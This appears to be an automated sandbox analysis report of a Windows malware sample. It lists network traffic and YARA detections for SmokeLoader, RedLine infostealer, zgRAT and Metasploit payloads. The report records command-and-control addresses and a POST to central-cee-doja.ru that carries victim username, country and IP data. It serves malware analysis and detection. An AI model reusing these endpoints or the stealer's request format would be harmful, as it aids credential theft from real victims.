while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:02:48 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 43Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c5 12 e1 5c a9 f8 70 7d 8e d7 5e f3 d0 3c 96 b3 2c 57 fc 10 ed 03 30 c8 Data Ascii: H>99$JY\p}^<,W0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:05 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 37Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 46 a3 8d 6c d6 b2 26 5d Data Ascii: H>99$JY@kjFl&]
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:07 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:08 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 53Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 55 a6 fa 76 a3 c4 ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<Uvj
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 414Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 34 39 2e 39 34 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.49.94.210 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Nov 2023 09:03:23 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 53Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 00 00 87 48 0e 3e 83 15 b2 bb 39 c8 39 c3 24 4a 59 cd fb c1 05 e1 40 b3 f7 6b 6a 82 c9 40 a3 92 72 ac a5 2b 5d dc 09 ba 16 3c f2 40 92 cc 4f 96 fd ab 6a a6 92 Data Ascii: H>99$JY@kj@r+]<@Oj

Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.152
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.210
Source: unknown	TCP traffic detected without corresponding DNS query: 194.49.94.210

Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp

String found in binary or memory: www.google.com,www.mit.edu,www.yahoo.com,www.slashdot.org equals www.yahoo.com (Yahoo)

Source: unknown

HTTP traffic detected: POST /cin.php?ownerid=1444&buildid=ww7legend&countp=0&countc=25&username=user&country=US&ipaddr=156.146.49.168&BSSID=1F8E0289C3&countw=0&rndtoken=Xzedin-807996411835&domaindetects=0 HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------8dbe8d78956b347Host: central-cee-doja.ruContent-Length: 83736Expect: 100-continueConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.29.134.23:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 147.135.36.89:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.193:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.90.185.9:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.217.98.121:443 -> 192.168.2.4:49829 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.227.21.98:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49840 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe, type: DROPPED

Contains functionality to capture screen (.Net source)

Source: 8427.exe.11.dr, -----------------------------------------.cs	.Net Code: _206A_200B_200D_202A_206B_200C_202B_200D_206D_206E_202A_206B_202C_202B_206C_202B_206B_206A_206F_202C_200F_202D_206F_206F_206A_202E_202A_202C_206A_206C_202C_200E_200C_202D_200F_200D_200E_206E_206E_200C_202E
Source: 8F82.exe.11.dr, dy.cs	.Net Code: lhp

Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\8427.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 43.2.D9EC.exe.27d948bd660.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 24.2.9AED.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.jtfCFDmLdX.exe.50b2220.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 43.2.D9EC.exe.27d9483d628.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 43.2.D9EC.exe.27d948bd660.12.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 12.0.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 43.2.D9EC.exe.27d949bd698.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 43.2.D9EC.exe.27d9cc00000.16.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 24.2.9AED.exe.570000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 43.2.D9EC.exe.27d9cc00000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 12.2.6rR8iy1.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 43.2.D9EC.exe.27d949bd698.11.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001F.00000002.2373883044.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2175797793.000000C0003A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2174358473.000000C000418000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000002.2379752347.000000C000E54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001F.00000003.2174358473.000000C00042E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2176077737.000000C0002C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2171483498.000000C0004F8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2175797793.000000C0003B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2173330685.000000C0004BA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000001F.00000003.2144147018.000000C000772000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 0000001F.00000003.2171483498.000000C00076C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, type: DROPPED	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\39D.exe, type: DROPPED	Matched rule: Detects downloader / injector Author: ditekSHen

PE file has a writeable .text section

Source: 5zQ4dC4.exe.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

.NET source code contains very large array initializations

Source: 3.2.2zx1310.exe.a01000.1.raw.unpack, -Module-.cs

Large array initialization: _003CModule_003E: array initializer size 2400

Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC3BA2	0_2_00FC3BA2
Source: C:\Users\user\Desktop\jtfCFDmLdX.exe	Code function: 0_2_00FC5C9E	0_2_00FC5C9E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	Code function: 1_2_004C3BA2	1_2_004C3BA2
